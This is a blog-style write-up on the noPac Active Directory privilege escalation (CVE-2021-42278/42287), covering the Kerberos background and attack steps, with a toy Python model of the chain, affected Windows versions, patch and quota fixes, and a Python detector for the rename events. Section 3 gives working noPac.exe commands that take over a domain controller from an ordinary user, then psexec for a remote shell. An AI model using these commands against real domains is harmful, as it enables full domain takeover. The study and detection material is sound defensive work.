xfeng


CVE-2021-42278 / CVE-2021-42287: Active Directory Privilege Escalation (noPac)

I saw someone publicly disclose an exploit (EXP) for the CVE-2021-42287 / CVE-2021-42278 privilege escalation vulnerabilities, so I collected the related information and studied it for learning purposes.

This chain lets an ordinary domain user elevate to domain administrator. Some preconditions apply (see 1.2), but they hold in a default domain, so the impact is severe.

Since the public information about this vulnerability is not very comprehensive and my own understanding is not thorough, the analysis below may not be entirely accurate.

1. Vulnerability Principle#

Before looking at the vulnerability itself, it helps to recall how the Kerberos protocol works.

In simple terms, Kerberos authentication consists of three exchanges:

| Step | Exchange | Result |
|---|---|---|
| AS exchange | AS-REQ / AS-REP | The client obtains a TGT (ticket-granting ticket) from the KDC |
| TGS exchange | TGS-REQ / TGS-REP | The client presents the TGT and obtains an ST (service ticket) |
| AP exchange | AP-REQ / AP-REP | The client presents the ST to the service and the session is established |

The authentication process is shown in the following diagram:

[image: Kerberos authentication flow diagram]

CVE-2021-42278 (sAMAccountName spoofing):

By convention a machine account's sAMAccountName is the computer name followed by $. Before the fix, the domain controller did not validate that a computer object's sAMAccountName actually ends with $. A user who can create or modify a machine account can therefore give it the name of an existing computer, such as the domain controller, with the $ stripped (AD02 alongside the real AD02$), and the DC accepts it because the two strings are different.

CVE-2021-42287 (KDC name fallback):

When the KDC processes a TGS-REQ, it looks up the client name (cname) carried in the TGT in Active Directory. If no account with that name exists, it does not reject the request; it retries the lookup with $ appended, i.e. it assumes the name refers to a machine account. An attacker who holds a TGT for an account named like the DC without the $, and who then renames or deletes that account, can make an S4U2self request in which the KDC resolves the cname to the real DC machine account. The KDC then issues a service ticket for the DC carrying the PAC of the impersonated user (for example the domain Administrator).

1.1 Vulnerability Process:#

  • Use an ordinary domain user to create a new machine account (by default ms-DS-MachineAccountQuota is 10, so any domain user may add up to ten computer objects).
  • Clear the servicePrincipalName of the new machine account (otherwise the rename is rejected), then change its sAMAccountName to the domain controller's name without the trailing $ (e.g. AD02 when the DC account is AD02$). CVE-2021-42278 is what lets the DC accept this.
  • Send an AS-REQ as the renamed account and obtain a TGT (Ticket Granting Ticket); its client name (cname) is now AD02.
  • Rename the machine account back (or delete it), so that an account called AD02 no longer exists in Active Directory.
  • Using that TGT, send a TGS-REQ with the S4U2self extension asking for a service ticket (ST) to the requester's own service on behalf of a privileged user such as Administrator.
  • The KDC decrypts the TGT and looks up the cname AD02. It finds nothing, so (CVE-2021-42287) it retries with $ appended and finds the real domain controller account AD02$. It therefore issues an ST for AD02$ whose PAC (Privilege Attribute Certificate) describes Administrator, encrypted with the DC machine account's key.
  • The attacker presents this ST to a service on the DC (for example cifs or ldap). The DC decrypts it with its own key, reads Administrator from the PAC, and the attacker now acts as a domain administrator on the domain controller.

1.2 Vulnerability Conditions:#

  • A low-privileged domain account can create machine accounts (ms-DS-MachineAccountQuota greater than 0) and modify the ones it created (the creator owns the object and can write its sAMAccountName and servicePrincipalName).
  • The DC does not enforce the trailing $ on a computer object's sAMAccountName, so the DC's name without $ is accepted.
  • When processing a TGS-REQ (this happens at the KDC, not during the AP exchange), the KDC cannot find the TGT's cname and retries the lookup with $ appended.
  • The spoofed name is a domain controller's machine account, so the S4U2self request resolves to an account whose service ticket grants access to the DC itself.
  • DC is not patched with KB5008380 or KB5008602.
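To make the process in 1.1 and the conditions in 1.2 concrete, here is an added model of the two flaws and their fixes. It is example code written for this post, not code from the post or from the noPac tool: the directory, ticket fields and KDC lookup are deliberate simplifications (assumptions) of Active Directory and the Windows KDC, and the names redteam.club, xfeng, test123 and AD02 are taken from the post's commands. Toggling the two `patched_*` flags shows which step each fix breaks.

```python
"""Toy model of the CVE-2021-42278 / CVE-2021-42287 chain (sAMAccountName spoofing).

Added example for this post, not code from the post or from noPac. Directory,
ticket fields and KDC lookup are deliberate simplifications (assumptions) of AD
and the Windows KDC; the names redteam.club, xfeng, test123 and AD02 come from
the post's commands.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

MACHINE_ACCOUNT_QUOTA = 10  # default ms-DS-MachineAccountQuota (assumed unchanged)


@dataclass
class Account:
    sam: str  # sAMAccountName
    sid: str
    is_computer: bool
    creator: Optional[str] = None
    spns: List[str] = field(default_factory=list)


@dataclass
class Ticket:
    cname: str                 # client name in the ticket
    client_sid: str            # SID carried in the PAC
    service_account: str = ""  # account whose key encrypts it ("" for a TGT)


class Directory:
    """Stand-in for AD: accounts keyed by upper-cased sAMAccountName."""

    def __init__(self, patched_42278=False):
        self.patched_42278 = patched_42278
        self.accounts: Dict[str, Account] = {}
        self._rid = 1000

    def get(self, sam):
        return self.accounts.get(sam.upper())

    def add(self, sam, is_computer, creator=None, spns=()):
        self._rid += 1
        acct = Account(sam, f"S-1-5-21-1-2-3-{self._rid}", is_computer, creator, list(spns))
        self.accounts[sam.upper()] = acct
        return acct

    def create_machine_account(self, creator, name):
        """Any domain user may add up to MACHINE_ACCOUNT_QUOTA computer objects."""
        if sum(a.creator == creator for a in self.accounts.values()) >= MACHINE_ACCOUNT_QUOTA:
            raise PermissionError("ms-DS-MachineAccountQuota exhausted")
        return self.add(name + "$", True, creator, [f"HOST/{name}"])

    def rename(self, old_sam, new_sam):
        acct = self.get(old_sam)
        # Simplification: the write fails while SPNs still carry the old name,
        # which is why the attack clears servicePrincipalName first.
        if acct.spns:
            raise ValueError("constraint violation: clear servicePrincipalName first")
        if self.get(new_sam) is not None:  # "AD02" and "AD02$" are different strings
            raise ValueError("sAMAccountName already exists")
        # CVE-2021-42278: before the fix the DC did not enforce the trailing '$'.
        if self.patched_42278 and acct.is_computer and not new_sam.endswith("$"):
            raise ValueError("computer sAMAccountName must end with '$' (CVE-2021-42278 fix)")
        del self.accounts[old_sam.upper()]
        acct.sam = new_sam
        self.accounts[new_sam.upper()] = acct


class KDC:
    def __init__(self, directory, patched_42287=False):
        self.d, self.patched_42287 = directory, patched_42287

    def as_req(self, sam):
        """AS exchange: the TGT names the client as it is called right now."""
        acct = self.d.get(sam)
        return Ticket(cname=acct.sam, client_sid=acct.sid)

    def _resolve_client(self, tgt):
        acct = self.d.get(tgt.cname)
        # CVE-2021-42287: an unknown cname is retried with '$' appended.
        if acct is None and not tgt.cname.endswith("$"):
            acct = self.d.get(tgt.cname + "$")
        if acct is None:
            raise LookupError("KDC_ERR_C_PRINCIPAL_UNKNOWN")
        # Fix: the PAC_REQUESTOR SID in the TGT must match the account that was found.
        if self.patched_42287 and acct.sid != tgt.client_sid:
            raise LookupError("PAC_REQUESTOR SID does not match resolved account (CVE-2021-42287 fix)")
        return acct

    def s4u2self(self, tgt, impersonate):
        """TGS exchange (S4U2self): a ticket to the requester's own service that
        carries the impersonated user's PAC, encrypted with the resolved account's key."""
        svc, user = self._resolve_client(tgt), self.d.get(impersonate)
        return Ticket(cname=user.sam, client_sid=user.sid, service_account=svc.sam)


def run_attack(patched_42278=False, patched_42287=False):
    """Walks the chain of section 1.1 and reports what the attacker ends up holding."""
    d = Directory(patched_42278)
    d.add("Administrator", False)
    d.add("xfeng", False)
    d.add("AD02$", True, spns=["HOST/AD02", "ldap/ad02.redteam.club"])  # the real DC
    kdc = KDC(d, patched_42287)
    try:
        fake = d.create_machine_account("xfeng", "test123")  # creates test123$
        fake.spns.clear()                                      # clear its SPNs
        d.rename("test123$", "AD02")                           # DC's name without '$'
        tgt = kdc.as_req("AD02")                               # TGT with cname AD02
        d.rename("AD02", "test123$")                           # now "AD02" does not exist
        st = kdc.s4u2self(tgt, "Administrator")                # KDC falls back to AD02$
    except (ValueError, PermissionError, LookupError) as exc:
        return f"blocked: {exc}"
    return f"service ticket for {st.service_account} with PAC of {st.cname}"
```

Run `run_attack()` for the unpatched case and it returns a ticket for AD02$ carrying Administrator's PAC; `run_attack(patched_42278=True)` fails at the rename, and `run_attack(patched_42287=True)` fails at the TGS lookup even though the rename succeeded, which is why both fixes matter independently.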

2. Affected Versions#

CVE-2021-42278
○ Windows Server 2012 R2
○ Windows Server 2012 (Server Core installation)
○ Windows Server 2012
○ Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
○ Windows Server 2008 R2 for x64-based Systems Service Pack 1
○ Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
○ Windows Server 2008 for x64-based Systems Service Pack 2
○ Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
○ Windows Server 2008 for 32-bit Systems Service Pack 2
○ Windows Server 2016 (Server Core installation)
○ Windows Server 2016
○ Windows Server, version 20H2 (Server Core Installation)
○ Windows Server, version 2004 (Server Core installation)
○ Windows Server 2022 (Server Core installation)
○ Windows Server 2019 (Server Core installation)
○ Windows Server 2022○ Windows Server 2019
○ Windows Server 2012 R2 (Server Core installation)
CVE-2021-42287
○ Windows Server 2012 R2 (Server Core installation)
○ Windows Server 2012 R2
○ Windows Server 2012 (Server Core installation)
○ Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
○ Windows Server 2012
○ Windows Server 2008 R2 for x64-based Systems Service Pack 1
○ Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
○ Windows Server 2008 for x64-based Systems Service Pack 2
○ Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
○ Windows Server 2008 for 32-bit Systems Service Pack 2
○ Windows Server 2016 (Server Core installation)
○ Windows Server 2016○ Windows Server, version 20H2 (Server Core Installation)
○ Windows Server, version 2004 (Server Core installation)
○ Windows Server 2022 (Server Core installation)
○ Windows Server 2022
○ Windows Server 2019 (Server Core installation)
○ Windows Server 2019

3. Vulnerability Reproduction#

Tools: noPac.exe (the C# noPac tool; the commands below are run from a Windows host that can reach the domain controller, with nothing more than an ordinary domain user's credentials).

3.1 Scanning and Detection#

The scan mode checks whether the domain's DCs are still vulnerable and reports the result without running the full attack chain:

```cmd
noPac.exe scan -domain redteam.club -user xfeng -pass 123456
```

3.2 Direct Exploitation (noPac.exe)#

The whole chain in one command: /mAccount and /mPassword name the temporary machine account to create, /dc selects the domain controller whose name is spoofed, /service chooses the service class of the final ticket, and /ptt injects the resulting ticket into the current session:

```cmd
noPac.exe -domain redteam.club -user test -pass pass@123 /dc ad02.redteam.club /mAccount test123 /mPassword feng /service cifs /ptt
```

With the ticket in the session, the DC's administrative share and a remote shell are reachable:

```cmd
dir \\ad01.redteam.club\c$
psexec.exe \\ad01.redteam.club cmd.exe
```

Note that the injected ticket is issued for the DC given in /dc (ad02.redteam.club above) and is encrypted with that DC's machine account key, so the UNC path and the psexec target must name the same DC; a ticket for ad02 is not accepted by ad01. Afterwards, check whether the temporary machine account (test123$) is still present in the domain and remove it.

4. Vulnerability Fix#

Microsoft has released security patches for both CVEs (this post refers to KB5008380 and KB5008602); the details are in the Microsoft Security Update Guide entries for CVE-2021-42278 and CVE-2021-42287.

Check whether your domain controllers have the corresponding security update installed. Independently of patching, setting ms-DS-MachineAccountQuota to 0 removes the ability of ordinary users to create the machine account the chain starts from.

[image: installed security updates on the domain controller]
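Patching aside, the rename sequence the chain relies on is visible in the Security log of the domain controller, so it can be alerted on. Below is an added detection example written for this post; it is not code from the post or from noPac. The event records are constructed for the example and reduced to the fields the rules read, and their field names follow the Security log schema of event 4741 (computer account created) and event 4781 (account renamed); which accounts are domain controllers is supplied by the caller.

```python
"""Spotting the sAMAccountName spoofing sequence in Windows Security events.

Added example for this post, not code from the post or from noPac. The events
are constructed and reduced to the fields the rules read; field names follow
the Security log schema of 4741 (computer account created) and 4781 (account
renamed). Which accounts are DCs is supplied by the caller.
"""
from typing import Dict, Iterable, List

# Constructed sample: the sequence the chain produces, plus a benign rename.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "4741", "SubjectUserName": "xfeng", "TargetUserName": "test123$"},
    {"EventID": "4781", "SubjectUserName": "xfeng",
     "OldTargetUserName": "test123$", "NewTargetUserName": "AD02"},
    {"EventID": "4781", "SubjectUserName": "xfeng",
     "OldTargetUserName": "AD02", "NewTargetUserName": "test123$"},
    {"EventID": "4781", "SubjectUserName": "helpdesk",
     "OldTargetUserName": "WS01$", "NewTargetUserName": "WS02$"},
]


def detect(events: Iterable[Dict[str, str]], dc_names: Iterable[str]) -> List[Dict[str, str]]:
    """Return one finding per suspicious 4781 rename, correlated with the 4741 creator."""
    dcs = {n.upper().rstrip("$") for n in dc_names}
    creator_of: Dict[str, str] = {}   # current sAMAccountName -> who created it (4741)
    spoofed = set()                   # names already flagged, to catch the revert
    findings = []
    for e in events:
        eid = e.get("EventID")
        if eid == "4741":
            creator_of[e["TargetUserName"].upper()] = e["SubjectUserName"]
            continue
        if eid != "4781":
            continue
        old, new = e["OldTargetUserName"], e["NewTargetUserName"]
        creator = creator_of.pop(old.upper(), None)   # follow the object across renames
        if creator:
            creator_of[new.upper()] = creator
        reasons = []
        if old.endswith("$") and not new.endswith("$"):
            reasons.append("computer account renamed to a name without '$'")
        if not new.endswith("$") and new.upper() in dcs:
            reasons.append("new name collides with a domain controller account")
        if old.upper() in spoofed:
            reasons.append("spoofed name reverted (a TGT was probably already obtained)")
        if not reasons:
            continue
        if old.upper() not in spoofed:
            spoofed.add(new.upper())
        findings.append({
            "actor": e["SubjectUserName"], "old": old, "new": new,
            "creator": creator or "unknown", "reasons": "; ".join(reasons),
        })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS, ["AD02$"]):
        print(finding)
```

On the sample, the rename to AD02 and the rename back are both reported with xfeng as creator, while the helpdesk rename of WS01$ to WS02$ stays silent. In production, feed it the 4741/4781 events from all DCs and the list of DC machine accounts from the Domain Controllers OU; a rename that strips the $ from a computer account has no legitimate use and can be alerted on by itself.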

5. Reference Articles#

https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html

https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
